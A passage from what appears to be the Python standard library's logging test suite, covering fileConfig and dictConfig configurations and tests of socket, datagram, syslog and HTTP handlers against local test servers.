# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
kwargs={{"encoding": "utf-8"}}
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, encoding="utf-8", **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_config_set_handler_names(self):
test_config = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
handlers=hand1
[handler_hand1]
class=StreamHandler
formatter=form1
[formatter_form1]
format=%(levelname)s ++ %(message)s
"""
self.apply_config(test_config)
self.assertEqual(logging.getLogger().handlers[0].name, 'hand1')
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
encoding="utf-8",
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
@support.requires_working_socket()
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop()
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
os_helper.unlink(self.address)
@support.requires_working_socket()
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop()
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
os_helper.unlink(self.address)
@support.requires_working_socket()
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop()
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
def test_udp_reconnection(self):
logger = logging.getLogger("slh")
self.sl_hdlr.close()
self.handled.clear()
logger.error("sp\xe4m")
self.handled.wait(0.1)
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
os_helper.unlink(self.address)
@unittest.skipUnless(socket_helper.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
@support.requires_working_socket()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop()
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = warnings_helper.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
